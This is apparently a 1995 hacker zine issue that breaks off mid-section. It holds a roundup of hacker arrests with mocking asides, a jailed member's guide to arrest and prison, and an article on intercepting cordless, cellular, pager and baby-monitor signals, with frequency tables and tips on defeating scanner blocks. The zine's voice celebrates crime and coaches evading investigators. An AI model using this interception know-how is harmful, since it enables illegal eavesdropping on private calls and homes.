- Removed at least 11 BBSs in one day
- Seized more than $200,000 in computer hardware
- Operation/Investigation lasted 6 months to 1 year
- April 12, 1995
- Busts are localized in Montreal
- 514 NPA
-
- =-=-=
-
- "DUTCH HACKER ARRESTED"
-
- (from CUD 7.21):
-
- --------------Original message----------------
-
- UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has
- become the first person to be convicted of computer hacking in the
- Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science
- student, was handed down a six month suspended sentence by
- magistrates last week, and was fined around $3,200
-
- Oosteveen was accused of breaking into university, corporate and
- government computers, following his arrested in March, 1993, just
- three weeks after new Dutch anti-hacking legislation came into force.
-
- Oosteveen was caught in the act of trying to hack into the computer
- lines of a technical university in Delft near The Hague. He is also
- thought to have been responsible for previous hacking attacks which
- occurred before the new legislation came into force.
-
- =-=-=
-
- "THE EAST COAST"
-
- Tabas and Others Bust:
-
- According to Gatsby, the following were busted: Himself, Mark Tabas
- KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker.
-
- (When I talked to him, he wasn't able to say much since it was the day
- after the bust)
-
- From empire Times:
- February 22, 1995
-
- One thing all the people have in common: Southwestern Bell - or at the very
- least, the desire and ability to hack all the switches on the west coast.
-
- According to those involved, it goes way beyond switches...
-
- =-=-=
-
- "THE LAMACCHIA CASE"
-
- April 94:
-
- BOSTON, MA ...A federal grand jury returned a felony indictment today
- charging an MIT student in a computer fraud scheme resulting in the piracy of
- an estimated million dollars in business and entertainment computer software.
-
- United States Attorney Donald K. Stern and FBI Special Agent In
- Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20,
- currently a junior at the Massachusetts Institute of Technology, was charged
- in a one count felony indictment with conspiring to commit wire fraud. The
- indictment charges that between November 21, 1993 and January 5, 1994
- LAMACCHIA operated a computer bulletin board service that permitted users
- to copy copyrighted business and entertainment software without paying to
- purchase the software. The bulletin board was operated without authorization
- on MIT computer work stations and was accessible to users worldwide over the
- Internet... [Losses] are estimated to exceed a million dollars. [bahaha]
-
- =-=-=
-
- "BRITISH CALLING CARD BUST"
-
- British students have taken part in an alleged ú65m computer fraud,
- involving the electronic theft of cards that allow users to make free
- telephone calls around the world.
-
- The hackers, one of whom was only 17 years old, were said to be earning
- thousands of pounds a month selling cards... Police found one teenager
- driving a new ú20,000 car and with computer equipment worth ú29,000 in his
- bedroom.
-
- AT&T officials also found a computer noticeboard called "Living Chaos"
- that was being used to sell the cards for up to ú30 each. It mentioned
- Andy Gaspard, an employee of the Cleartel telephone company in
- Washington, whose home was raided. "We found 61,500 stolen cards ready
- to be sent to Britain," said Eric Watley, a secret service agent in the city.
-
- (The Sunday Times, 12 February 1995)
-
- =-=
-
- "TNO BUST OF 1994 - NEW NEWS"
-
- (my comments in [ ])
-
- ROCKY MOUNTAIN NEWS
- (Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995)
- Quartet accused of hacking into Arapahoe college's system,
- inciting illegal acts.
-
- ---------------------------------------------------------------------------
- (Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran)
- Suspects used equipment at college to incite criminal acts, officials say.
-
- Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!]
- allegedly gained access to the Arapahoe Community College computer and
- used it to distribute tips on how to commit crimes.
- One man operated a computer bulletin board on which contributors
- from throughout the world exchanged how-to information on crimes ranging
- from credit-card fraud to high-tech burglary, authorities said. [Of course
- they fail to make that distinguishing gap that this board was NOT run off
- the Arapahoe system, and that it was a private BBS run out of his house]
- Computers were seized from the homes of four hackers, ranging in
- age from 15 to 21. Secret Service experts were called in to help crack
- the computer files. ['type filename.txt' is hard to crack eh?]
- Investigators found software for breaking passwords, lists of
- private passwords for several computer systems, instructions for cellular
- telephone fraud, private credit reports [Plural? Nope], lists of credit-card
- numbers and electronic manuals on how to make bombs and illegal drugs.
- [Yes, WE did the oklahoma bombing!@$!]
- In a 97-page affidavit detailing the 18-month investigation,
- investigator John Davis of the Arapahoe district attorney's office said
- that the hackers "operate with an attitude of indifference to the rights
- and privacy of others and have made efforts to teach and involve others in
- their criminal enterprise." [What the fuck does the government do everyday?]
- At the home of a Denver juvenile, authorities found hazardous
- chemicals and a book on how to make bombs.
- Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19,
- of Thornton, were charged last month with committing computer crimes and
- conspiracy. Both are scheduled to appear in Arapahoe County Court on July
- 5.
- A decision is pending on whether to charge a 15-year-old Highlands
- Ranch youth and a 17-year-old Denver resident, chief deputy district
- attorney John Jordan said Friday.
- The affidavit says Papadenis, Jackson, and the youths hacked into
- the Arapahoe County Community College computer system, then used it to
- illegally distribute copyrighted computer games [Sorry, TNo doesn't have
- a warez division yet] and electronic magazines promoting fraud, theft,
- burglary and money-laundering.
- One of the magazines stated, "This publication contains information
- pertaining to illegal acts. The use of this information is intended solely
- for evil purposes." [Source: CoTNo 1!@#!@]
- Court documents do not indicate the hackers had political motives,
- and authorities declined to comment on the case. [Hackers with political
- motives would be way above their head.]
- A Denver University expert said computer criminals usually are not
- motivated by ideology. They usually are young people who are "doing it for
- the sheer challenge of it - just to demonstrate that they're able to do it,"
- said Don McCubbery, director for the center on electronic commerce at DU.
- McCubbery estimates that authorities learn of only 5% of computer
- crimes. He said computer security experts generally have difficulty
- keeping up with the hackers. [No shit]
-
- -----------------------------------------------
- (Side note box) THE NEW ORDER (Bullet listing)
-
- Some accusations listed in court documents concerning The New Order group
- of computer hackers:
- - A hacker from the United Kingdom offered suspect John Jackson
- a VISA card number with a $300,000 credit limit. [Tacos anyone?]
- - A computer seized from a Highlands Ranch home contained password
- files for computer systems at the University of Colorado
- at Boulder.
- - A note found in Jackson's home indicated his plans to hack into
- the Thornton Police Department computer. [Yes, they believe
- everything they read]
- - Jackson also had a computer file containing access information
- for Taco Bell and McDonald's computers. [There goes national
- security!]
-
- =-=
-
- That is all for now. Not a good year by any means as you can tell,
- especially considering who else may have been busted, that we didn't hear
- about. Don't stop what you are doing though, just be more careful of
- your activities. YOU are right, THEY are wrong.
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
- What Happens When You Get Caught
- --------------------------------
- [A.K.A The Hackers Guide to the Law and Prisons]
-
- by
-
- D. Fanning - A.K.A. John Falcon/Renegade - TNO
-
-
- Well if you are reading this, that means you are either curious or shit
- happened and the law reared it's ugly head and they nabbed you. Now what
- you are about to read is absolutely fucking true. Why is this? Because I
- am spending the next year or so in prison for hacking. Now needless to
- say, I have already announced my retirement from the scene, but I still
- wanted to write and rant and rave about all the things that happen in this
- world and to clue you in on a quite a few things.
-
- Let's start with the ground rules:
-
- 1. You cannot make a deal with a cop. So when they start reading Miranda
- rights, keep silent or just ask inconspicuous questions like "Where are we
- going?", or the common ne, "What's going on here? Why am I being charged?"
-
- Only a D.A. or someone in the lawyer capacity can make a deal. If a
- cop offers a deal, you are still going to get charged. Cops cannot
- make any exceptions on anyone. So drop all ideas of such.
-
- 2. Do not narc on anyone when the questioning starts. Your best bet would
- be to just stay silent till the lawyer shows up or something. Why?
- Questioning wouldn't be done unless there were gaps in their
- investigation. What you want is as many of those as possible. The
- more you have, the better it will be when plea bargaining starts up.
- At the very least though, lets say the they do convict you, the feds
- and the court find you guilty or you plea that way and you are thrown
- into the clink. Guess who does your admissions paperwork? You guessed
- it, the inmates. Word has a way of coming around to dealing or giving
- a very wide berth to those who do the narc thing Key idea: "If you
- fall, don't bring others down too. It just adds to the load on you."
-
- 3. During questioning, they will put on a lot of plays to make you talk,
- they will offer you something to drink or something to make you feel
- more comfortable. Well why not? Spend 60 cents and get your work done
- for you by a confession. Makes things nice and neat. Don't fall for
- it. If you are thirsty, accept the drink and don't tell them shit.
-
- 4. They will also do some kind of powerplay on you. They try to make you
- think that they are doing you a favor, but in reality, you are digging
- a deeper hole for yourself.
-
- 5. The idea of you being innocent until proven guilty has gone the way of
- the do-do bird. When a jury sees you, the first thought that comes to
- mind is not if you are guilty or not, the question is HOW guilty you
- are. The way they see it, if you are not guilty, what are you doing
- in front of them in the first place? The O.J. Simpson trial is a
- perfect example. Also, look how many cop shows are around the box.
- That right there is a disgrace in my book. First they have you on
- film, second they pat each other on the back while you are in
- misery. Sick.
-
- Well on with the show. If they have already done an investigation on you
- and you don't hear from them in a while, the first natural reaction would
- be to relax and let your guard down. WRONG ANSWER! That means that some
- shit is really going to go down. You should be extra careful and not
- talk about it to anyone. Most likely they are looking for more evidence
- to make it harder on you in the long run, like a wiretap. In the federal
- system, all you need is one person's permission to record a phone call.
- If you have to talk about it, use face to face contact and pat each other
- down to make sure there is no bug. For instance, when I was arrested I made
- a fatal mistake and talked about it to one of the co-defendants and he
- had cut a deal with the D.A. already. My bacon was cooked when I heard
- my voice on a tape recording.
-
- Well no matter what happens, sooner or later you will get nabbed so I won't
- get into the details of this. All I can suggest is that you really do
- what ever you can to get a real attorney. P.D.'s are good for some
- things but they get their paycheck from the same place that nabbed you in
- the first place so don't let that fool you too much. I will admit that
- it is better than nothing though.
-
- Most likely for the computer hackers out there, they will charge you
- under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access
- Device. This charge was mainly intended for credit cards but the D.A.'s
- have taken it to just about everything that involves computers or
- communications in general.
-
- Now there are some landmark cases that have beat this into the ground.
- One of them being U.S. vs Brady which was a guy making satellite decoders
- with the stops pulled out of them. He beat this due to the ruling that
- the signal was out there everywhere and that he merely just decoded the
- signal. Therefore there was no actual loss, just potential loss which
- doesn't count. Another one is U.S. vs McNutt in the 10th Circuit of
- Utah. This guy made chips for cellular phones that would send different
- ESN/MIN pairs to the cell site that made it always seem like a new roamer
- every time he calls. The cell site just goes ahead and gives him the call
- because it doesn't have time to verify if it is a valid MIN/ESN pair. He
- won the case due to the same fact that there were no accountable loss
- because it never used or really billed any legit customer.
-
- The flip side of that is being two weeks ago from when this was written,
- a guy was tried in LA for the exact same thing and was found guilty,
- appealed the case, won the appeal, then the government re-appealed it and
- he lost again. This caused a split in the court circuits which means
- that this will got the Supreme Court.
-
- Remember that the government or any government agency will not press any
- issue unless there is some kind of financial deal behind it because they
- are wasting time and resources on you when they can be getting Joe Blow
- Cartel Drug Dealer.
-
- So they find you guilty or you plea. The next step is the Pre-Sentence
- Investigation. They basically take a fine tooth comb and find any dirt
- about you that they can. You will be amazed about all the things they
- can do to make you seem like a threat to society, the American way of
- life, apple pie and all... All you can do is make sure or try your
- hardest to make it clean as possible. Now I got ripped hard on mine due
- to very strained relations with one of my parents and they managed to
- throw everything that anyone had ever said about me together to make it
- look like I was truly evil. That is where the cops will come back and
- haunt you because everything you say will be in that report. Every
- little action and all will be written with a slant of a cop. (Needless to
- say who writes the report kids... The U.S. Probation Office, a branch of
- the Secret Service and the F.B.I.)
-
- Well you are convicted and here you are. Depending on where you live,
- you will either be bussed/vanned to the prison where they choose for
- you or they will fly you there. After you are sentenced you now belong
- to the Bureau of Prisons (A D.O.J. branch). Basically you will be taken
- to a county jail for holding while they classify you and then you get
- transported out. When I was transported out, I was in shackles and all
- taking a ride on Fed Air. The USM's have a fleet of 737's they confiscated
- from drug busts and converted them into their own use. You are basically
- bussed out to a unused or empty part of the airport and with a large ring of
- USM's with shotguns in their hand, you get put onto an airplane and given a
- box lunch and off you go. I went from Portland to Sacramento to Phoenix
- in one day. Spent the night at the FCI in Phoenix then the next morning
- from there to Lompoc where I am now.
-
- Remember these words though... You are now property of the B.O.P. Basically
- you are luggage, they can transport you at any time whenever they want to.
- But, depending on where you go, it isn't all that bad. Most likely you will
- meet friends or acquaintances that will help you along. Just ask a few
- questions and usually they will know. One thing to never do is be secretive
- about why you are there. You are there, most likely someone else is there
- for the same thing and you can get a strong fellowship going with people
- in the same predicament.
-
- One thing to always keep in mind from now to eternity, no matter where you go.
- The feds are nailing everyone for 'Conspiracy'. It's a damn shame when
- you go to a place where 90 percent of the inmate population is here on some
- kind of drug related charge and of that 90%, 35% are here on conspiracy
- related charges. Truly something to think about.
-
- Now for the hackers and phreakers that are facing jail. If your PSI report
- even breaths any mention of some kind of use with the computer, you will be
- banned from that. 3 days ago I was given a list of direct orders to avoid
- all contact of that. Likewise, they put a restriction on the levels of
- computer related material that I can read. Usually you can get any
- periodical you want except for things that deal with gay man on man stuff.
- Just like the gay people feel, that smells of discrimination but that's
- just the way it is.
-
- Phones are something else that you will wish that changes real quick. The
- phones are run by a B.O.P. thing called ITS-Inmate Telephone Services.
- Basically it's a Unix run PBX that limits the people you can call and it
- throws the bill on you. No more collect calls or anything of that nature.
- Just doesn't happen. But the inmates have won a Class action suit against
- the B.O.P. about this and the government right now is appealing it.
- Technically with a suit or even an appeal, you have to implement it
- as soon as you can after the judgement is made. But it's been a year
- since they won it and nothing changes. Basically it's the government stalling.
-
- Well that's all for me to say this time around. Remember to keep the dream
- alive and judge for yourself with that piece of gray matter between your
- ears.
-
- You can write any comments to me at:
- Fanning
- Reg No. 12617-006
- 3600 Guard Road
- Lompoc, CA 93436
-
- or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net
- (I prefer the first method to save my friends postage costs.)
-
- Keep it strong - TNO (The New Order)
-
- John Falcon - Ex-TNo
- 1981-1994
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
- --- Legal and Technical Aspects of RF Monitoring ---
-
- --- Major [TNo] ---
-
-
-
- SYNOPSIS
- --------
- The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article
- doubtlessly sparked an interest in cordless phone monitoring. Wireless
- telephones are a prime target for monitoring. Both cordless and cellular
- telephones are nothing more than radio transceivers that, at some point,
- interface with the telephone system. This article will seek to expand on
- and clarify some points made in "Cordless Fun", and also to point to some
- other areas of interest.
-
- =============================================================================
-
-
- CORDLESS
- --------
- Legal Stuff:
- Monitoring cordless phones is now a federal crime! Recent legislation
- prohibits listening in on cordless phones, much the same as cellular phones.
- Also, the Communications Act of 1934 makes it a crime to divulge
- anything you monitor to another person. It is also illegal to use anything
- that you hear for personal gain. Note that this applies to anything that you
- monitor, not just cordless phones. Alternatively, there are presently no
- restrictions on scanners that are capable of receiving cordless phone
- frequencies. However, I suspect that in the near future the feds will deny
- certification to such scanners, as they did with scanners that could receive
- cellular frequencies.
-
- Technical Stuff:
- Cordless telephones transmit and receive with very low power. This is
- primarily to minimize interference with other nearby cordless telephones.
- This makes scanning for cordless telephones a short-range endeavor. Most
- cordless phones of recent manufacture operate in the 46-49MHz range.
- However, the FCC has recently opened up a part of the 900MHz spectrum for
- cordless telephone usage. The new 900MHz phones often offer greater range
- and increased clarity. There are also models sporting "spread-spectrum"
- technology, which makes monitoring with conventional scanning-receivers a
- virtual impossibility. Another security measure on some cordless phones
- involves encoding the DTMF tones sent from the handset to the base. This
- prevents the base from accepting tones from other, unauthorized, handsets.
- It does not hinder monitoring the calls, but the DTMF tones will not be
- recognizable. In the 46-49MHz phones, there are ten frequency pairs
- available. Many older phones only utilize one pair. Newer, more expensive,
- phones can utilize all ten pairs. Some automatically search for an open
- channel, while others can be manually manipulated to find a channel with less
- noise. Likewise, the new 900MHz phones will scan to find a clear channel.
-
-
- CELLULAR
- --------
- Legal Stuff:
- Intercepting cellular mobile telephone (CMT) traffic is illegal. The
- Electronic Communications Privacy Act of 1986 made it so. Scanners that
- receive the CMT portion of the 800MHz range may no longer be manufactured,
- sold, or imported into the U.S. Many scanners were designed to scan this
- area, though. When the Cellular Telephone Industry Association began
- complaining about this fact, most scanner manufacturers/resalers voluntarily
- "blocked" the cellular freqs from their scanners. This pacified the CTIA for
- a while, but the "blocks" were easily hackable. Typically, restoring a
- "blocked" scanner involved removing a single diode, a ten minute job for even
- the most devout technophobe. This fact led to the passage of the Telephone
- Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C.
- certification of scanners that receive cellular freqs, or those which may be
- easily modified to do so. New scanners will be "blocked" at the CPU, and
- hacking them is unlikely. Frequency converters offered another means of
- monitoring cellular and other 800MHz traffic. Essentially, a converter
- receives an 800MHz signal, and converts it to a 400MHz signal that the scanner
- is capable of receiving. Converters are useful for scanners that have no
- 800MHz reception capabilities, as well as those that have portions of the
- 800MHz band blocked. Unfortunately, converters were also outlawed by the
- TDDRA. They are still legal in kit-form, however. Another option would be
- to build one from scratch, which isn't an especially difficult project.
-
- Technical Stuff:
- The word "cellular" defines the cellular phone system. A service area is
- broken up into many small cells. As a user travels through an area, his call
- will be handed off from one cell to the next. This handoff is transparent to
- the user, but a monitor will lose the conversation. Cellular phones use low
- power (a maximum of five watts) so that a cell phone will not attempt to seize
- more than one site at a time. When a call is initiated by a cell phone, the
- nearest site will respond, and assign an available frequency to the phone.
- When the user moves comes into range of the next site, the process repeats
- itself, and the new site will assign a new frequency. Therefore, it can be
- difficult to track a particular conversation as it moves from site to site
- with a single scanner. Every area served by cellular phones will have two
- service providers. One will be the local RBOC, while the other will be a
- cellular-only provider. The two systems are designated as "A" and "B"
- systems, or "Wireline" and "Non-Wireline". There is no difference between
- the two for monitoring purposes, but since "A" and "B" carriers use different
- frequencies, it should be possible to identify local cell-towers as being "A"
- or "B" sites.
-
-
- PHONE PATCH
- -----------
- Legal Stuff:
- The Communications Act of 1934 applies here as well, but there are no other
- prohibitions on monitoring business-band phone patches.
-
- Technical Stuff:
- Many business radio systems have the ability to tie into the phone
- system. Most of these systems will be found in 800MHz trunked
- radio systems. In a conventional radio system, one frequency will
- equal one channel. In a trunked system, however, frequencies and
- channels are independent of each other. The trunking computer will
- assign a different frequency to a radio each time it transmits,
- and it will send a signal to other radios on the same channel,
- telling them the current frequency in use. Phone patches are easy
- to monitor, though. Since the radio on a phone patch is
- transmitting constantly, the frequency used will remain the same
- for the duration of the conversation. Many people mistakenly
- believe these calls to be cellular, but they are not. Most phone
- patches found in 800MHz trunked systems will be full-duplex, just
- like cellular and home phones. Some systems, especially in UHF
- (around 450MHz) and 800MHz conventional radio systems will only be
- half-duplex, though. In those systems, only one person call talk
- at a time, just like normal two-way radios. Radio systems are
- typically designed to offer service to an entire metropolitan area,
- so range is quite good. The mobile radio will transmit its signal
- to a strategically located "repeater", which then re-broadcasts the
- signal with much more power. So long as a scanner is within
- reception range of the repeater output, monitoring will be possible
- regardless of the location of the party transmitting.
-
-
-
- EQUIPMENT
- ----------
- Legal Stuff:
- Some states prohibit mobile use of scanners. Also, it is illegal
- to use a scanner in the commission of a crime.
-
- Technical Stuff:
- There is a scanner for every appetite. What sort of monitoring
- one wants to do will dictate which scanner one buys. For someone
- interested only in cordless phones, a ten-channel scanner with no
- 800MHz coverage will be quite adequate, and much cheaper than a
- more capable scanner. For someone interested in cellular, a full-
- coverage 800MHz scanner with a much greater frequency storage
- capacity will be necessary. Base, mobile or handheld? Depends
- entirely on how it will be used. Modern scanners are programmable,
- while older units require crystals. For someone wanting to monitor
- only a few channels (such as cordless phones, or the local police),
- a crystal-controlled scanner would be adequate, and much cheaper.
- But for more serious and varied scanning, programmable units are
- a necessity. Models are available that store between 10 and 1000
- channels. Uniden/Bearcat and Realistic are the two most commonly
- available brands in the U.S. (although Realistic isn't actually a
- brand, just a label...Radio Shack scanners are all manufactured by
- Uniden or GRE, depending on the model). Because of the TDDRA, many
- of the best scanners from the past several years are no longer
- available, but watch for Hamfests (great electronic flea-
- markets...inquire at your local ham radio/electronics store),
- garage sales, etc. There is nothing in the TDDRA or other current
- legislation that prevents private parties from owning or selling
- pre-TDDRA equipment. Aside from the scanner itself, the next-most
- important piece of equipment is the antenna. Handheld scanners
- will generally utilize an "all-band" rubber-duck antenna (a
- flexible, rubberized antenna, between 8-14" in length), while base
- units will have a telescoping metal whip antenna. These antennas
- are adequate for receiving strong, local signals, but more
- discriminating monitors will demand more. For base units, an all
- band discone type antenna, mounted outside as high as practical,
- will offer good, omnidirectional performance. For those who only
- want to monitor a particular band, it would be best to use an
- antenna cut specifically for that band. Likewise, for those
- monitoring signals coming from one general direction, a directional
- antenna will offer better performance than an omnidirectional unit.
- For mobile use, using an antenna mounted on the vehicle will
- greatly improve reception.
-
-
- MISCELLANEOUS COMMUNICATIONS
- ----------------------------
- Voice-pagers can offer interesting monitoring. While the data-
- transmissions that send the signal to the proper pager are
- proprietary digital signals (and as such, illegal to monitor or
- decipher), the actual "voice messages" are transmitted "in the
- clear".
- Packet-radio is used by ham radio operators. They have a vast
- network of computer bbs's that operate independently of the phone
- system. Modulated data is sent over the airwaves with a ham
- transceiver, where it is received and de-modulated with a Terminal
- Node Controller (TNC). Expect the use of wireless data
- transmissions to increase over the next few years, and not just
- among ham operators.
- While not having anything to do with telephones, the "baby
- monitors" people use are transmitters just like cordless phones.
- They are also low-power devices, so range is limited. Most people
- who use these devices would be shocked to learn that they are
- "bugging" their own home.
-
- PRESENT AND FUTURE CHALLENGES
- -----------------------------
- Spread spectrum, digital transmissions, encryption...these are all
- factors that are affecting monitoring today. While most cellular
- systems are presently analog systems, there are operational digital
- systems in some areas. Scanners that are currently available won't
- be able to decipher the digital communications, and it is unlikely
- that digital-capable scanners will be produced. That means it will
- be up to the hackers to provide the technology to intercept these
- communications. Spread spectrum is quite hackable, as it was never
- intended as an encryption system, per se, yet the phone
- manufacturers are certainly marketing it as such. And one oft
- overlooked advantage of the Clipper chip is the fact that the
- backdoor can be exploited by hackers as well as the government.
- In the meanwhile, there are plenty of intercepts to be had, and
- there will continue to be.
-
-
- =================================================================
-
- For More Information:
- =================================================================
-
- Scanner Modification Handbook (Vols. I & II), by Bill Cheek
- The scanner modification handbooks offer a plethora of information
- on hacking scanners. Hacks include: increased channel capacity
- (example: RS PRO-2006 from 400 channels to 6,400!), adding signal-
- strength meters, cellular-freq. restoration, scanning-speed
- increases, and much more.
-
- World Scanner Report, by Bill Cheek
- A monthly newsletter on the latest scanner hacks.
-
- Available from:
- COMMtronics Engineering
- Box 262478
- San Diego, CA 82196-2478
- BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!)
-
- COMMtronics Engineering also offers a scanner-computer interface
- for RS PRO-43/2004/2005/2006 model scanners.
- ===================================================================
- CRB Research Books
- Box 56
- Commack, MY 11725
-
- CRB has books on scanner modifications, frequency guides, and other
- interesting subjects.
- =================================================================
- POPULAR COMMUNICATIONS
-
- CQ Publications
- 76 N. Broadway
- Hicksville, NY 11801
- (516) 681-2926
-
- Pop Comm is a monthly magazine on all sorts of radio monitoring,
- including scanning, shortwave, and broadcast.
- ==================================================================
- MONITORING TIMES
-
- Grove Enterprises, Inc.
- P.O. Box 98,
- 300 S. Highway 64 West
- Brasstown, North Carolina 28902-0098
-
- M.T. is a monthly magazine covering all varieties of radio
- communications.
-
- ==================================================================
- NUTS & VOLTS
- Nuts & Volts is a monthly magazine that covers a wide variety of
- electronic-related subjects.
-
- T&L Publications, Inc.
- 430 Princeland Court
- Corona, CA 91719
- (909) 371-8497
- (909) 371-3052 fax
- CI$ 74262,3664
- 1-800-783-4624 SUBSCRIPTION ORDERS ONLY
- ===================================================================
- USENET:
- alt.radio.scanner
- rec.radio.scanner
- ===================================================================
-
- Charts & Tables:
-
- 1. Cordless Telephone Frequencies (VHF)
- 2. Cordless Telephone Frequencies (900MHz)
- 3. Cellular Telephone Frequencies
- 4. Business Band Frequencies (VHF, UHF, 800MHz)
- 5. IMTS Frequencies
- 6. PAGER Frequencies
- 7. PACKET Frequencies
- 8. ROOM MONITOR Frequencies
- 9. homebrew cordless dipole antenna
- 10. homebrew 1/4 wave groundplane antenna
-
-
- =================================================================
- TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL)
-
- CH BASE HANDSET
- -- ---- -------
- 1 46.100 49.670
- 2 46.630 49.845
- 3 46.670 49.860
- 4 46.710 49.770
- 5 46.730 49.875
- 6 46.770 49.830
- 7 46.830 49.890
- 8 46.870 49.930
- 9 46.930 49.990
- 10 46.970 46.970
- =================================================================
- TABLE 2 - 900MHz CORDLESS FREQS.
-
- Cordless phones have been allocated the frequencies
- between 902-228MHz, with channel spacing between
- 30-100KHz.
- Following are some examples of the frequencies used by phones
- currently on the market.
-
- ----------------------------------------------------------------
- Panasonic KX-T9000 (60 Channels)
- base 902.100 - 903.870 Base frequencies (30Khz spacing)
- handset 926.100 - 927.870 Handset frequencies
- CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
- -- ------- ------- -- ------- ------- -- ------- -------
- 01 902.100 926.100 11 902.400 926.400 21 902.700 926.700
- 02 902.130 926.130 12 902.430 926.430 22 902.730 926.730
- 03 902.160 926.160 13 902.460 926.460 23 902.760 926.760
- 04 902.190 926.190 14 902.490 926.490 24 902.790 926.790
- 05 902.220 926.220 15 902.520 926.520 25 902.820 926.820
- 06 902.250 926.250 16 902.550 926.550 26 902.850 926.850
- 07 902.280 926.280 17 902.580 926.580 27 902.880 926.880
- 08 902.310 926.310 18 902.610 926.610 28 902.910 926.910
- 09 902.340 926.340 19 902.640 926.640 29 902.940 926.940
- 10 902.370 926.370 20 902.670 926.670 30 902.970 926.970
-
- 31 903.000 927.000 41 903.300 927.300 51 903.600 927.600
- 32 903.030 927.030 42 903.330 927.330 52 903.630 927.630
- 33 903.060 927.060 43 903.360 927.360 53 903.660 927.660
- 34 903.090 927.090 44 903.390 927.390 54 903.690 927.690
- 35 903.120 927.120 45 903.420 927.420 55 903.720 927.720
- 36 903.150 927.150 46 903.450 927.450 56 903.750 927.750
- 37 903.180 927.180 47 903.480 927.480 57 903.780 927.780
- 38 903.210 927.210 48 903.510 927.510 58 903.810 927.810
- 39 903.240 927.240 49 903.540 927.540 59 903.840 927.840
- 40 903.270 927.270 50 903.570 927.570 60 903.870 927.870
-
- ------------------------------------------------------------
-
- V-TECH TROPEZ DX900 (20 CHANNELS)
- 905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
- 925.5 - 927.4 HANDSET FREQUENCIES
-
- CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
- -- ------- ------- -- ------- ------- -- ------- -------
- 01 905.600 925.500 08 906.300 926.200 15 907.000 926.900
- 02 905.700 925.600 09 906.400 926.300 16 907.100 927.000
- 03 905.800 925.700 10 906.500 926.400 17 907.200 927.100
- 04 905.900 925.800 11 906.600 926.500 18 907.300 927.200
- 05 906.000 925.900 12 906.700 926.600 19 907.400 927.300
- 06 906.100 926.000 13 906.800 926.700 20 907.500 927.400
- 07 906.200 926.100 14 906.900 926.800
-
- ------------------------------------------------------------
- OTHER 900 MHZ CORDLESS PHONES
- AT&T #9120 - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ
- OTRON CORP. #CP-1000 902.1 - 903.9 & 926.1 - 927.9 MHZ
- SAMSUNG #SP-R912- - - 903.0 & 927.0 MHZ
-
- ------------------------------------------------------------
- ==================================================================
- TABLE 3 - CELLULAR TELEPHONE FREQUENCIES
- wireline ("b" side carrier)
- 824.1000-834.9000
- 869.0100-879.9900
-
- non-wireline ("a" side carrier)
- 835.0200-849.0000
- 880.0200-894.0000
-
-
- ==================================================================
- TABLE 4 - BUSINESS BAND RADIO FREQS.
-
- 151.5050-151.9550MHz
- 154.4900-154.5400
- 460.6500-462.1750
- 462.7500-465.0000
- 471.8125-471.3375
- 474.8125-475.3375
- 896.0125-900.9875
- 935.0125-939.9875
- 806.0125-810.9875
- 811.0125-815.9875
- 816.0125-820.9875
- 851.0125-855.9875
- 856.0125-860.9875
- 861.0125-865.9875
- =================================================================
- TABLE 5 - MOBILE TELEPHONE FREQS. (see note1 below)
- SIMPLEX OUTPUT INPUT OUTPUT INPUT
- -------- -------- -------- -------- --------
- 035.2600 152.0300 158.4900 454.3750 459.3750
- 035.3000 152.0600 158.5200 454.4000 459.4000
- 035.3400 152.0900 158.5500 454.4250 459.4250
- 035.3800 152.1200 158.5800 454.4500 459.4500
- 035.5000 152.1500 158.6100 454.4750 459.4750
- 035.5400 152.1800 158.6400 454.5000 459.5000
- 035.6200 152.2100 158.6700 454.5250 459.5250
- 035.6600* 454.0250 459.0250 454.5500 459.5500
- 043.2200* 454.0500 459.0500 454.5750 459.5750
- 043.2600 454.0750 459.0750 454.6000 459.6000
- 043.3400 454.1000 459.1000 454.6250 459.6250
- 043.3800 454.1250 459.1250 454.6500 459.6500
- 043.4200 454.1500 459.1500
- 043.3000 454.1750 459.1750
- 043.5000 454.2000 459.2000
- 043.5400 454.2250 459.2250
- 043.5800* 454.2500 459.2500
- 043.6400* 454.2750 459.2750
- 152.2400* 454.3000 459.3000
- 152.8400* 454.3250 459.3250
- 158.1000* 454.3500 459.3500
- 158.7000*
-
- *-also allocated for pager usage
-
- (note1: These freqs are, for the most part, dead. The FCC has
- reallocated most of these for other services.)
-
- =================================================================
- TABLE 6 - PAGER FREQUENCIES
- 035.2200 035.5800 152.4800 154.6250 158.4600
- 157.7400 465.0000 462.8000 462.7750 462.9250
- 462.7500 462.8750 462.8250 462.9000 462.8500
- 928.0000 929.0000 930.0000 931.0000
- =================================================================
- TABLE 7 - PACKET FREQUENCIES
- 050.6200
- 223.5200-223.6400
- 223.7100-223.8500
- 2303.500-2303.800
- 2303.900
- 2399.000-2399.500
- =================================================================
- TABLE 8 - BABY MONITOR FREQUENCIES
- 49.300
- 49.830
- 49.845
- 49.890
- =================================================================
- TABLE 9 - AIR PHONE FREQUENCIES
- OUTPUT INPUT
- 454.6750 459.6750
- 454.9750 459.9750
- 849.0000 851.0000
- 894.0000 896.0000
- ==================================================================
-
- CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING
-
- The best way to improve the range for monitoring cordless
- telephones is to use an antenna specifically cut for the
